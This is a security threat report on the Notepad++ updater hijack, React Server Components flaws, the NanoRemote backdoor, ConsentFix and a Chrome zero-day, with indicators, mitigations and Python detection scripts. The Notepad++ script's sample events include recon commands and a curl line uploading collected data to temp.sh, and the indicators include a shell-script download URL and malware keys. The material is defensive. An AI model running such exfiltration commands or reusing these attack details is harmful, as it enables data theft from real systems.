F5 Threat Report - December 17th, 2025
Notepad++ Fixes Flaw That Let Attackers Push Malicious Update Files
Notepad++ version 8.8.9 was released to address a weakness in its WinGUp update tool that had been exploited to deliver malicious executables in place of legitimate updates. Reports described the GUP.exe updater spawning an unauthorized "%Temp%\AutoUpdater.exe" process, which ran reconnaissance commands (`netstat -ano`, `systeminfo`, `tasklist`, `whoami`), wrote the results to `a.txt`, and exfiltrated that file to `temp[.]sh` using `curl.exe`. Notepad++ developer Don Ho first responded with version 8.8.8 on November 18th, which restricted update downloads to GitHub. The more robust fix arrived with version 8.8.9 on December 9th: the updater now verifies the digital signature and certificate of each downloaded installer and aborts the update if that validation fails. Security researcher Kevin Beaumont separately reported three organizations with incidents in which initial access originated from Notepad++ processes, pointing to possible hijacking of the update-check URL (`https://notepad-plus-plus.org/update/getDownloadUrl.php`) to redirect users to malicious downloads. Users are advised to upgrade to version 8.8.9 and to remove any custom root certificates installed prior to v8.8.7, as all official binaries are now signed.
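The chain above (updater spawns a binary from %Temp%, that binary runs discovery commands redirected into a.txt, curl pushes the file to temp.sh) is a process-tree pattern an EDR or Sysmon pipeline can match. The following is an added example of that detection logic, not code from the Notepad++ project or any of the cited sources. It runs over constructed process-creation events carrying the three fields a Sysmon Event ID 1 record provides (image, parent image, command line); the event field names, the sample events, the curl upload syntax, and the assumed naming pattern of a legitimate Notepad++ installer are this example's own.

```python
"""Process-tree detection for the Notepad++ updater hijack (added example)."""
import re
from pathlib import PureWindowsPath

TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# Assumed name pattern of a legitimate installer that GUP.exe downloads to
# %Temp% and runs; a genuine update must not trip rule 1. Tune to your fleet.
NPP_INSTALLER = re.compile(r"^npp\.[\d.]+\.Installer(\.x64|\.arm64)?\.exe$", re.IGNORECASE)
RECON_CMD = re.compile(r"\b(netstat|systeminfo|tasklist|whoami)\b", re.IGNORECASE)
REDIRECT_TO_A_TXT = re.compile(r">{1,2}\s*\"?\S*?a\.txt", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
UPDATERS = {"gup.exe"}  # the Notepad++ updater; add other updaters you run
DROPPED_UPDATER = "autoupdater.exe"

# Constructed telemetry, not captured from a real host.
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files\Notepad++\updater\GUP.exe",             # 1 normal launch
     "parent_image": r"C:\Program Files\Notepad++\notepad++.exe",
     "command_line": "GUP.exe -v8.8.6"},
    {"image": r"C:\Users\jdoe\AppData\Local\Temp\AutoUpdater.exe",       # 2 unexpected %Temp% child
     "parent_image": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "command_line": r"C:\Users\jdoe\AppData\Local\Temp\AutoUpdater.exe"},
    {"image": r"C:\Windows\System32\cmd.exe",                             # 3 recon -> a.txt
     "parent_image": r"C:\Users\jdoe\AppData\Local\Temp\AutoUpdater.exe",
     "command_line": r"cmd.exe /c netstat -ano >> %Temp%\a.txt"},
    {"image": r"C:\Windows\System32\cmd.exe",                             # 4 recon -> a.txt
     "parent_image": r"C:\Users\jdoe\AppData\Local\Temp\AutoUpdater.exe",
     "command_line": r"cmd.exe /c whoami >> %Temp%\a.txt"},
    {"image": r"C:\Windows\System32\curl.exe",                            # 5 exfil (syntax constructed)
     "parent_image": r"C:\Users\jdoe\AppData\Local\Temp\AutoUpdater.exe",
     "command_line": r'curl.exe -F "file=@C:\Users\jdoe\AppData\Local\Temp\a.txt" https://temp.sh/upload'},
    {"image": r"C:\Windows\System32\whoami.exe",                          # 6 interactive admin, benign
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "whoami"},
    {"image": r"C:\Windows\System32\cmd.exe",                             # 7 recon -> a.txt, no updater lineage
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "cmd.exe /c tasklist > a.txt"},
]
# Assumed shape of a legitimate update: the updater runs the signed installer from %Temp%.
LEGIT_UPDATE_EVENT = {
    "image": r"C:\Users\jdoe\AppData\Local\Temp\npp.8.8.9.Installer.x64.exe",
    "parent_image": r"C:\Program Files\Notepad++\updater\GUP.exe",
    "command_line": r"C:\Users\jdoe\AppData\Local\Temp\npp.8.8.9.Installer.x64.exe",
}


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def analyze(events):
    """Return (severity, rule, event) tuples for every rule each event trips."""
    alerts = []
    for ev in events:
        child = basename(ev["image"])
        parent = basename(ev["parent_image"])
        cmd = ev["command_line"]
        # Rule 1: updater launched something from %Temp% that is not the installer.
        if parent in UPDATERS and TEMP_DIR.search(ev["image"]) and not NPP_INSTALLER.match(child):
            alerts.append(("high", "updater_spawned_unexpected_temp_binary", ev))
        # Rule 2: discovery output redirected into a.txt; escalate under the dropped updater.
        if RECON_CMD.search(cmd) and REDIRECT_TO_A_TXT.search(cmd):
            severity = "high" if parent == DROPPED_UPDATER else "medium"
            alerts.append((severity, "recon_redirect_to_a_txt", ev))
        # Rule 3: updater lineage spawning a shell that runs discovery commands.
        if parent in UPDATERS | {DROPPED_UPDATER} and child in SHELLS and RECON_CMD.search(cmd):
            alerts.append(("high", "updater_lineage_shell_discovery", ev))
        # Rule 4: curl talking to the exfiltration host named in the report.
        if child == "curl.exe" and "temp.sh" in cmd.lower():
            alerts.append(("high", "curl_to_temp_sh", ev))
    return alerts


if __name__ == "__main__":
    for severity, rule, ev in analyze(SAMPLE_EVENTS):
        print(f"{severity:6} {rule:40} {ev['command_line']}")
```

Rule 1 is the one most likely to misfire in practice, because a legitimate update also runs an installer out of %Temp%; the allow-list pattern is what keeps it quiet, so verify it against your own update traffic before deploying. Rules 2 and 4 carry the specific artifacts from the report (a.txt, temp.sh) and rule 3 implements the generic control from the compliance advice (updater lineage spawning a shell for discovery), which survives a change of file names.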
Severity: Critical
Sources:
https://buaq.net/go-380719.html
https://gbhackers.com/notepad-flaw-attackers-hijack-update-traffic/
https://malwaretips.com/threads/notepad-updater-installed-malware.138657/
https://securityonline.info/urgent-patch-notepad-wingup-flaw-allowed-malware-to-hijack-updates/
https://www.bleepingcomputer.com/news/security/notepad-plus-plus-fixes-flaw-that-let-attackers-push-malicious-update-files/
https://www.hendryadrian.com/notepad-fixes-flaw-that-let-attackers-push-malicious-update-files/
https://www.securitylab.ru/news/567129.php
Threat Details and IOCs
Technologies: Microsoft Windows, Notepad++
Threat Actors: FatBeehive
Attacker Countries: China
Attacker Domains: temp.sh (a public temporary file-hosting service used as the exfiltration drop, not attacker-owned infrastructure)
Attacker URLs: https://notepad-plus-plus.org/update/getDownloadUrl.php (this is the legitimate Notepad++ update-check endpoint that is suspected of having been hijacked; it is the target of the attack, not attacker infrastructure, and should not be blocklisted)
Victim Industries: Critical Manufacturing, Financial, Financial Services, Government, Healthcare, Information Technology, Manufacturing, Software, Telecommunications
Victim Countries: Afghanistan, Bangladesh, Bhutan, China, India, Japan, Maldives, Mongolia, Nepal, North Korea, Pakistan, South Korea, Sri Lanka, Taiwan
Mitigation Advice
Identify all assets with Notepad++ installed and upgrade them to version 8.8.9 or newer.
Using an EDR or endpoint management tool, scan all endpoints for the existence of the file `AutoUpdater.exe` in any `%Temp%` directory.
Query endpoint and command-line logs for the execution of reconnaissance commands (`netstat`, `systeminfo`, `tasklist`, `whoami`) that redirect output to a file named `a.txt`.
Add the domain `temp.sh` to your network blocklist on your firewall, DNS sinkhole, and web proxy.
Audit user and system certificate stores for any custom root certificates related to older Notepad++ installations and remove them.
Compliance Best Practices
Implement a software asset management (SAM) program to maintain a real-time inventory of all applications and versions installed on company assets to ensure timely patching.
Develop and deploy an application control policy that prevents the execution of programs from user-writable directories such as `%Temp%`.
Configure your EDR to generate alerts when common software updater processes spawn command shells (like cmd.exe or powershell.exe) to execute discovery commands.
Implement a network egress filtering policy that denies outbound traffic by default and explicitly allows only traffic required for business operations.
Incorporate modules into your security awareness training program that teach users how to verify official software download sources and recognize the risks of installing software from advertisements or untrusted websites.
Denial of Service and Source Code Exposure in React Server Components
Two new vulnerabilities have been disclosed in React Server Components, and affected applications should be upgraded immediately. They are a high-severity denial of service (CVE-2025-55184 and CVE-2025-67779, CVSS 7.5) and a medium-severity source code exposure (CVE-2025-55183, CVSS 5.3). The denial of service allows a single malicious HTTP request to trigger an infinite loop that consumes CPU and hangs the server process; it is reachable even if the application implements no React Server Function endpoints, as long as it supports React Server Components. The source code exposure lets an attacker retrieve the source of a Server Function if that function explicitly or implicitly stringifies one of its arguments, which can leak secrets hardcoded in the function body (secrets supplied at runtime are not affected). The flaws affect `react-server-dom-webpack`, `react-server-dom-parcel`, and `react-server-dom-turbopack` in versions 19.0.0, 19.0.1, 19.0.2, 19.1.0, 19.1.1, 19.1.2, 19.2.0, 19.2.1, and 19.2.2. Fixes have been backported to 19.0.3, 19.1.4, and 19.2.3, and all users are strongly advised to upgrade to one of these patched versions. Affected frameworks and bundlers include next, react-router, waku, @parcel/rsc, @vite/rsc-plugin, and rwsdk.
Applications that do not use a server, or that do not use a framework or bundler supporting React Server Components, are not affected.
Severity: Critical
Sources:
https://buaq.net/go-381099.html
https://cyberpress.org/react-server-components-flaws-enable-dos-attacks-and-source-code-exposure/
https://gbhackers.com/severe-flaws-in-react-server-components-enable-dos-attacks/
https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components
https://securityonline.info/react-patches-two-new-flaws-risking-server-crashing-dos-and-source-code-disclosure/
https://thehackernews.com/2025/12/new-react-rsc-vulnerabilities-enable.html
Threat Details and IOCs
(The malware, threat-actor and network indicators below are aggregated from reporting on React Server Components exploitation in general, including the earlier remote code execution flaw CVE-2025-55182 that is also listed; they are not drawn from the React advisory for the two new CVEs, which publishes no indicators.)
Malware: Agent Tesla, AISURU, ANGRYREBEL, AshTag, BEACON, BPFDoor, BRICKSTORM, Cobalt Strike, EtherRAT, Noodle RAT (also tracked as Nood RAT), Predator, Sliver, ValleyRAT, Winos
CVEs: CVE-2025-55182, CVE-2025-55183, CVE-2025-55184, CVE-2025-67779
Technologies: Meta React Server Components, Node.js, Parcel, React, React Router, Vercel Next.js, Vercel Turbopack, Vite, Waku, Webpack
Threat Actors: Calypso, Earth Bluecrow, Earth Lamia, Iron Tiger, Jackpot Panda, Lazarus Group, Red Menshen, Rocke, UNC5342
Attacker Countries: China, North Korea
Attacker IPs: 78.153.140.16
Attacker URLs: 78.153.140.16/re.sh
Victim Industries: Business Services, E-commerce, Education, Financial Services, Gaming, Government, Healthcare, Legal and Professional Services, Logistics, Manufacturing, Multimedia, Retail, Software, Technology Hardware, Telecommunications, Web Hosting
Victim Countries: Australia, Canada, China, France, Germany, Hong Kong, India, Singapore, United Kingdom, United States
Mitigation Advice
Scan all code repositories to identify applications using React Server Components, specifically looking for the vulnerable packages `react-server-dom-webpack`, `react-server-dom-parcel`, and `react-server-dom-turbopack`, or affected frameworks like `next` and `react-router`.
For any application identified as using a vulnerable version of `react-server-dom-webpack`, upgrade the package to a patched version: 19.0.3, 19.1.4, or 19.2.3, matching the minor line in use.
For any application identified as using a vulnerable version of `react-server-dom-parcel`, upgrade the package to a patched version: 19.0.3, 19.1.4, or 19.2.3, matching the minor line in use.
For any application identified as using a vulnerable version of `react-server-dom-turbopack`, upgrade the package to a patched version: 19.0.3, 19.1.4, or 19.2.3, matching the minor line in use.
For applications using affected frameworks like Next.js or react-router, upgrade the framework to a version that incorporates the patched React Server Components packages.
Compliance Best Practices
Implement a centralized secrets management solution, such as HashiCorp Vault or a cloud-native option like AWS Secrets Manager or Azure Key Vault, to store and manage all application secrets instead of hardcoding them in source files.
Integrate static application security testing (SAST) tools into the CI/CD pipeline to automatically scan for and block any code commits that contain hardcoded secrets.
Configure and tune the Web Application Firewall (WAF) with rate-limiting rules to detect and block anomalous or high-volume requests targeting application endpoints, which can help mitigate denial-of-service attacks.
Review and formalize the third-party software patch management policy to ensure critical vulnerabilities are identified and remediated within a defined timeframe, including subscribing to security advisories for all critical libraries and frameworks.
NanoRemote: Advanced Windows Backdoor Leveraging Google Drive API for Stealthy C2
NanoRemote is a Windows backdoor first identified in October 2025 by Elastic Security Labs. It uses the Google Drive API for command-and-control (C2) and file staging, so its traffic blends with legitimate cloud operations. The C++ implant is associated with the espionage-linked REF7707 cluster (also tracked as CL-STA-0049, Earth Alux, and Jewelbug), which targets government, telecom, aviation, and education organizations, and it represents an evolution from the cluster's earlier FINALDRAFT implant, which used the Microsoft Graph API in the same role. The attack chain typically begins with WMLOADER, a loader masquerading as Bitdefender's BDReinit.exe and carrying an invalid signature, which decrypts and executes the NanoRemote payload from `wmsetup.log` using a rolling XOR routine followed by AES-CBC decryption with the key `3A5AD78097D944AC`. NanoRemote itself communicates over HTTP POST, sending Zlib-compressed, AES-CBC-encrypted JSON to `/api/client` on a non-routable IP address with the User-Agent `NanoRemote/1.0`; it uses the hard-coded AES-CBC key `558bec83ec40535657833d7440001c00` for that channel and Google Drive API OAuth 2.0 tokens for the Drive channel. Its 22 command handlers cover system enumeration, file system operations, a custom PE loader, remote command execution, and Google Drive download/upload tasks, with `libPeConv` and Microsoft Detours used for stealth. Detection is complicated by the cloud API abuse, so defenders should rely on behavioral detection rules, YARA rules for artifacts such as `wmsetup.log`, and the MITRE ATT&CK mappings (Exfiltration Over Web Service, Masquerading, Discovery, Command Execution, Defense Evasion). Immediate incident response includes isolating infected machines, rotating Google API credentials, forensic analysis, auditing API logs for atypical Google Drive activity, and blocking known C2 IPs; longer-term remediation focuses on Zero Trust principles, cloud API monitoring, and SIEM/UEBA integration.
Severity: Critical
Sources:
https://buaq.net/go-381078.html
https://cyberpress.org/nanoremote-malware/
https://cybersrcc.com/2025/12/11/nanoremote-advanced-windows-backdoor-leveraging-google-drive-api-for-stealthy-c2/
https://malwaretips.com/threads/meet-nanoremote-a-newly-discovered-windows-backdoor-that-leverages-the-google-drive-api-for-data-theft-and-payload-staging.138663/
https://thehackernews.com/2025/12/nanoremote-malware-uses-google-drive.html
https://www.hendryadrian.com/nanoremote-cousin-of-finaldraft/
Threat Details and IOCs
Malware: FINALDRAFT, NanoRemote, Squidoor, WMLOADER
Technologies: Bitdefender, Google Drive, Microsoft Graph, Microsoft Windows, Trend Micro
Threat Actors: CL-STA-0049, Earth Alux, Jewelbug, REF7707
Attacker Countries: China
Attacker URLs: /api/client, /drive/v3/files/%s?alt=media, /upload/drive/v3/files (the last two are Google Drive API paths; match them together with the client process or the C2 indicators, not on their own)
Attacker Hashes: 1e28c01387e0f0229a3fb3df931eaf80, 35593a51ecc14e68181b2de8f82dde8c18f27f16fcebedbbdac78371ff4f8d41, 558bec83ec40535657833d7440001c00 (this 32-hex value is the hard-coded AES-CBC key quoted above, not a file hash), 57e0e560801687a8691c704f79da0c1dbdd0f7d5cc671a6ce07ec0040205d728, 999648bd814ea5b1e97918366c6bd0f82b88f5675da1d4133257b9e6f4121475, b26927ca4342a19e9314cf05ee9d9a4bddf7b848def2db941dd281d692eaa73c, fff31726d253458f2c29233d37ee4caf43c5252f58df76c0dced71c4014d6902
Victim Industries: Aerospace, Defense, Education, Financial Services, Government, Healthcare, Information Technology, Logistics, Manufacturing, Retail, Software, Technology Hardware, Telecommunications
Victim Countries: Argentina, Bolivia, Brazil, Brunei, Cambodia, Chile, Colombia, Ecuador, Guyana, Indonesia, Laos, Malaysia, Myanmar, Paraguay, Peru, Philippines, Russia, Singapore, Suriname, Taiwan, Thailand, Timor-Leste, Uruguay, Venezuela, Vietnam
Mitigation Advice
Scan all Windows endpoints for the presence of files named 'wmsetup.log' and executables named 'BDReinit.exe' that have an invalid or missing digital signature.
Search all available network logs (e.g., proxy, firewall, DNS) for outbound HTTP requests containing the User-Agent string 'NanoRemote/1.0'.
Obtain and deploy the publicly available YARA rules for NanoRemote and WMLOADER into your endpoint detection and response (EDR) or other file scanning solutions.
Use an EDR or endpoint management tool to query all Windows systems for the existence of the environment variable 'NR_GOOGLE_ACCOUNTS'.
Create a SIEM or network intrusion detection system (NIDS) rule to alert on HTTP POST requests to any URI ending in '/api/client' that carry the User-Agent 'NanoRemote/1.0'.
If a compromise is suspected or confirmed, immediately review and revoke suspicious Google Workspace OAuth tokens and rotate API credentials for the affected accounts.
Compliance Best Practices
Implement a Cloud Access Security Broker (CASB) to gain visibility into Google Drive API usage and establish policies to detect and alert on anomalous activity, such as unusually frequent uploads or downloads by a service account.
Establish a data pipeline to ingest Google Workspace audit logs, specifically including Google Drive API activity, into your SIEM for centralized analysis and alerting.
Initiate a recurring audit of all Google Workspace OAuth applications and service account permissions, revoking unnecessary or overly permissive API access based on the principle of least privilege.
Refine and tune your Endpoint Detection and Response (EDR) platform's behavioral rules to generate high-fidelity alerts for suspicious memory allocation (VirtualAlloc) followed by execution, especially from non-standard processes.
Implement application control policies on endpoints to restrict which executables are permitted to make outbound connections to known cloud service domains like 'googleapis.com'.
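The network-side mitigations above reduce to three checks over proxy logs: the fixed User-Agent, POSTs to a URI ending in /api/client on a non-routable address, and Google Drive API transfers from a client that has already tripped one of the first two. The following is an added example of that detection logic, not code from Elastic Security Labs or any cited source. The log lines are constructed and follow a whitespace-separated layout this example defines (timestamp, client IP, method, URL, status, quoted User-Agent); adapt the parser to your proxy's format.

```python
"""Proxy-log detection for the NanoRemote indicators (added example)."""
import ipaddress
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

NANOREMOTE_UA = "NanoRemote/1.0"
LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d+) "(.*)"$')
DRIVE_DOWNLOAD = re.compile(r"^/drive/v3/files/[^/]+$")   # the report's /drive/v3/files/%s?alt=media
DRIVE_UPLOAD_PREFIX = "/upload/drive/v3/files"           # the report's upload path

# Constructed log lines; no real hosts or traffic.
SAMPLE_LOG = """\
2025-12-11T09:14:02Z 10.20.1.15 POST http://192.168.50.7/api/client 200 "NanoRemote/1.0"
2025-12-11T09:14:05Z 10.20.1.15 GET https://www.googleapis.com/drive/v3/files/1AbC?alt=media 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2025-12-11T09:15:11Z 10.20.1.22 GET https://www.googleapis.com/drive/v3/files/9XyZ?alt=media 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2025-12-11T09:16:40Z 10.20.1.31 POST https://intranet.example.internal/api/client 204 "MyApp/2.3"
2025-12-11T09:17:03Z 10.20.1.15 POST https://www.googleapis.com/upload/drive/v3/files?uploadType=media 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2025-12-11T09:18:20Z 10.20.1.40 POST http://172.16.9.9/api/client 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
"""


@dataclass
class Event:
    ts: str
    client_ip: str
    method: str
    url: str
    user_agent: str

    @property
    def host(self) -> str:
        return urlsplit(self.url).hostname or ""

    @property
    def path(self) -> str:
        return urlsplit(self.url).path

    @property
    def query(self) -> dict:
        return parse_qs(urlsplit(self.url).query)


def parse(log_text: str) -> list:
    events = []
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if m:
            ts, ip, method, url, _status, ua = m.groups()
            events.append(Event(ts, ip, method, url, ua))
    return events


def is_private_host(host: str) -> bool:
    """True only for literal RFC 1918 / non-routable addresses. Hostnames are
    not judged here; a production rule would resolve or classify them."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False


def is_drive_transfer(ev: Event) -> bool:
    if ev.host != "www.googleapis.com":
        return False
    if DRIVE_DOWNLOAD.match(ev.path) and ev.query.get("alt") == ["media"]:
        return True
    return ev.path.startswith(DRIVE_UPLOAD_PREFIX)


def detect(log_text: str) -> list:
    events = parse(log_text)
    alerts, suspects = [], set()
    for ev in events:
        if ev.user_agent == NANOREMOTE_UA:
            alerts.append({"severity": "high", "rule": "nanoremote_user_agent",
                           "client_ip": ev.client_ip, "url": ev.url})
            suspects.add(ev.client_ip)
        elif ev.method == "POST" and ev.path.endswith("/api/client") and is_private_host(ev.host):
            # Survives a User-Agent change; needs tuning where internal apps expose /api/client.
            alerts.append({"severity": "medium", "rule": "api_client_post_to_private_host",
                           "client_ip": ev.client_ip, "url": ev.url})
            suspects.add(ev.client_ip)
    # Drive API transfers are normal on their own; report them only for clients already flagged.
    for ev in events:
        if ev.client_ip in suspects and is_drive_transfer(ev):
            alerts.append({"severity": "info", "rule": "drive_transfer_from_suspect_host",
                           "client_ip": ev.client_ip, "url": ev.url})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a['severity']:6} {a['rule']:34} {a['client_ip']} {a['url']}")
```

The User-Agent check is the only high-confidence match and is also the easiest indicator for the operator to change, which is why the second rule keys on the protocol shape instead, and why the Drive API paths are treated as corroboration rather than as indicators in their own right.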
New ConsentFix Attack Hijacks Microsoft Accounts via Azure CLI
ConsentFix, a variant of the ClickFix social engineering technique identified by Push Security, abuses the Azure CLI OAuth application to take over Microsoft accounts without stealing a password or defeating multi-factor authentication (MFA): the victim performs a genuine sign-in and then hands the resulting authorization code to the attacker. The attack begins when a victim lands on a compromised, high-ranking website that shows a fake Cloudflare Turnstile CAPTCHA asking for a business email address. If the address matches the attacker's target list, the victim is prompted to click a "Sign in" button that leads to a legitimate Microsoft login page for the Azure CLI application. After authentication or account selection, Microsoft redirects the browser to a localhost URL that carries an Azure CLI OAuth authorization code; because nothing is listening on the victim's machine, the page fails to load. The malicious site then instructs the victim to paste that URL back into a form, which gives the attacker the authorization code and, through it, full control of the account under the Azure CLI application's permissions. The flow is designed to trigger only once per victim IP address. To mitigate this threat, organizations should monitor for anomalous Azure CLI sign-in activity, particularly from new IP addresses or from users who do not normally use the tool, and scrutinize the use of legacy Azure AD Graph scopes. Detection can be further enhanced through Microsoft Defender for Cloud Apps' "Malicious OAuth app consent" policies, Azure AD Identity Protection's consent phishing and workload identity risk detections, and by actively monitoring AADGraphActivityLogs for unusual activity.
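The first detection the report calls for, anomalous Azure CLI sign-ins from new addresses or from users who never use the tool, is a baseline-and-compare over sign-in logs. The following is an added example of that check, not Push Security's or Microsoft's code. It runs over constructed records shaped like Entra ID (Azure AD) sign-in log entries; the field names follow the sign-in log schema, while the display names used for the Azure CLI application and for the legacy Azure AD Graph resource are assumptions to verify against your own tenant's logs, and the users and addresses are invented.

```python
"""Baseline-and-compare detection for anomalous Azure CLI sign-ins (added example)."""
from collections import defaultdict
from datetime import datetime, timezone

AZURE_CLI_APP = "Microsoft Azure CLI"                  # assumed appDisplayName; verify in your tenant
LEGACY_AAD_GRAPH = "Windows Azure Active Directory"     # assumed resourceDisplayName of the legacy Azure AD Graph API
DEFAULT_CUTOFF = datetime(2025, 12, 1, tzinfo=timezone.utc)  # records before this form the baseline

# Constructed sign-in records; not real users, tenants or addresses.
SAMPLE_SIGNINS = [
    {"createdDateTime": "2025-11-20T09:00:00+00:00", "userPrincipalName": "alice@example.com",
     "appDisplayName": "Microsoft Azure CLI", "resourceDisplayName": "Microsoft Graph", "ipAddress": "203.0.113.10"},
    {"createdDateTime": "2025-11-21T08:30:00+00:00", "userPrincipalName": "bob@example.com",
     "appDisplayName": "Office 365 Exchange Online", "resourceDisplayName": "Office 365 Exchange Online", "ipAddress": "198.51.100.5"},
    {"createdDateTime": "2025-12-08T10:15:00+00:00", "userPrincipalName": "alice@example.com",
     "appDisplayName": "Microsoft Azure CLI", "resourceDisplayName": "Microsoft Graph", "ipAddress": "203.0.113.10"},
    {"createdDateTime": "2025-12-08T10:42:00+00:00", "userPrincipalName": "alice@example.com",
     "appDisplayName": "Microsoft Azure CLI", "resourceDisplayName": "Windows Azure Active Directory", "ipAddress": "192.0.2.77"},
    {"createdDateTime": "2025-12-08T11:05:00+00:00", "userPrincipalName": "bob@example.com",
     "appDisplayName": "Microsoft Azure CLI", "resourceDisplayName": "Microsoft Graph", "ipAddress": "192.0.2.78"},
    {"createdDateTime": "2025-12-08T11:20:00+00:00", "userPrincipalName": "carol@example.com",
     "appDisplayName": "Office 365 Exchange Online", "resourceDisplayName": "Office 365 Exchange Online", "ipAddress": "198.51.100.9"},
]


def _ts(record: dict) -> datetime:
    return datetime.fromisoformat(record["createdDateTime"])


def build_baseline(records: list, cutoff: datetime) -> dict:
    """Per user, the set of source IPs seen for Azure CLI sign-ins before the cutoff.
    A user absent from the result has never used the Azure CLI in the baseline window."""
    cli_ips = defaultdict(set)
    for r in records:
        if _ts(r) < cutoff and r["appDisplayName"] == AZURE_CLI_APP:
            cli_ips[r["userPrincipalName"]].add(r["ipAddress"])
    return cli_ips


def detect(records: list, cutoff: datetime) -> list:
    """Evaluate Azure CLI sign-ins at or after the cutoff against the baseline."""
    baseline = build_baseline(records, cutoff)
    findings = []
    for r in records:
        if _ts(r) < cutoff or r["appDisplayName"] != AZURE_CLI_APP:
            continue
        user, reasons = r["userPrincipalName"], []
        if user not in baseline:
            reasons.append("first_azure_cli_use_for_user")
        elif r["ipAddress"] not in baseline[user]:
            reasons.append("azure_cli_from_new_ip")
        if r["resourceDisplayName"] == LEGACY_AAD_GRAPH:
            reasons.append("legacy_aad_graph_resource")   # the legacy Graph use the report flags
        if reasons:
            severity = "high" if "first_azure_cli_use_for_user" in reasons or len(reasons) > 1 else "medium"
            findings.append({"user": user, "ip": r["ipAddress"], "time": r["createdDateTime"],
                             "reasons": reasons, "severity": severity})
    return findings


def run_sample() -> list:
    return detect(SAMPLE_SIGNINS, DEFAULT_CUTOFF)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f['severity']:6} {f['user']:20} {f['ip']:15} {', '.join(f['reasons'])}")
```

Two design points matter in practice. A user who has never used the Azure CLI suddenly producing a sign-in under that application is the strongest signal and is rated high on its own, because in ConsentFix the victim never runs the tool; the attacker's token use shows up under the application name. A new IP alone is only medium, since developers do travel, so it is combined with the legacy Graph resource check before it is escalated.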
Severity: Critical
Sources:
https://cyberpress.org/consentfix-attack/
https://www.bleepingcomputer.com/news/security/new-consentfix-attack-hijacks-microsoft-accounts-via-azure-cli/
Threat Details and IOCs
Malware: CyberVolk 2.x, NANOREMOTE, VolkLocker
Technologies: Microsoft 365, Microsoft Azure, Microsoft Azure CLI, Microsoft Entra ID, Microsoft Intune
Attacker IPs: 12.75.116.137, 12.75.216.90, 182.3.36.223
Attacker Domains: fastwaycheck.com, previewcentral.com, trustpointassurance.com
Attacker URLs: hxxps://fastwaycheck.com/, hxxps://previewcentral.com, hxxps://trustpointassurance.com/
Victim Industries: Aerospace, Government, Healthcare, Non-Governmental Organizations (NGOs), Retail, Supply Chain
Victim Countries: United States
Mitigation Advice
Review Azure AD sign-in logs for unusual Azure CLI login activity, focusing on logins from unexpected IP addresses or geolocations, or by users who do not typically use the Azure CLI.
Create detection rules in your SIEM to alert on the use of legacy Azure AD Graph API scopes within OAuth consent grants, as this is a known attacker technique to evade detection.
Send an immediate security bulletin to all employees warning them never to copy a full URL from their browser's address bar into a website form, especially if the URL contains 'localhost' or authentication codes.
Compliance Best Practices
Implement a recurring process to audit all OAuth applications in Azure AD, reviewing their permissions, usage, and business justification, and remove any unnecessary or overly permissive applications.
Deploy and configure Microsoft Defender for Cloud Apps, enabling specific policies like 'Malicious OAuth app consent' to automatically detect and alert on suspicious OAuth application activity.
Enable and monitor detections within Azure AD Identity Protection, specifically focusing on 'Consent Phishing' and 'workload identity risk' alerts, and create automated response actions for high-severity findings.
Develop and enforce a policy based on the principle of least privilege to restrict Azure CLI access to only authorized administrative and developer roles.
Establish a continuous security awareness training program that includes modules on identifying and responding to sophisticated phishing and consent grant attacks.
Google Patches Chrome Zero-Day Vulnerability Exploited in Attack
Google has released an urgent Chrome update for a zero-day vulnerability that is being actively exploited in the wild. The flaw is identified in the report only as 466192044, a Chromium bug-tracker number; no CVE was cited, and Google has withheld technical details while coordination is ongoing, though it has confirmed active exploitation. It is the eighth Chrome zero-day fixed this year, following CVE-2025-13223, CVE-2025-10585, CVE-2025-6558, CVE-2025-6554, CVE-2025-5419, CVE-2025-2783, and CVE-2025-4664. The same update also resolves CVE-2025-14372, a use-after-free in the Password Manager, and CVE-2025-14373, an inappropriate-implementation issue in the Toolbar. All Chrome versions prior to 143.0.7499.109 are affected; users should upgrade immediately to stable channel version 143.0.7499.109/.110 on Windows and Mac or 143.0.7499.109 on Linux.
Severity: Critical
Sources:
https://buaq.net/go-380989.html
https://threatprotect.qualys.com/2025/12/11/google-patches-zero-day-vulnerability-exploited-in-attack/
https://www.techradar.com/pro/security/google-releases-emergency-fix-for-yet-another-zero-day
Threat Details and IOCs
CVEs: CVE-2025-14372, CVE-2025-14373
Technologies: Apple macOS, Google Chrome, Linux, Microsoft Edge, Microsoft Windows
Threat Actors: DarkHotel, Lazarus, TaxOff, Team46
Victim Industries: Financial Services, Government, Healthcare, Technology Hardware
Victim Countries: United States
Mitigation Advice
Update all Google Chrome installations on Windows and macOS to version 143.0.7499.109/.110 and on Linux to version 143.0.7499.109.
Initiate a vulnerability scan using Qualys QID 386201 to identify all endpoints with vulnerable versions of Google Chrome.
Compliance Best Practices
Implement and configure an automated patch management solution to ensure security updates for all third-party software, especially web browsers, are deployed within 72 hours of release.
Develop and enforce a security policy using Group Policy Objects (GPO) or a similar endpoint management tool to disable non-essential browser features, such as the built-in password manager, and enforce the use of a dedicated enterprise password management tool.
F5 Threat Report - December 10th, 2025
JPCERT Confirms Active Command Injection Attacks on Array AG Gateways
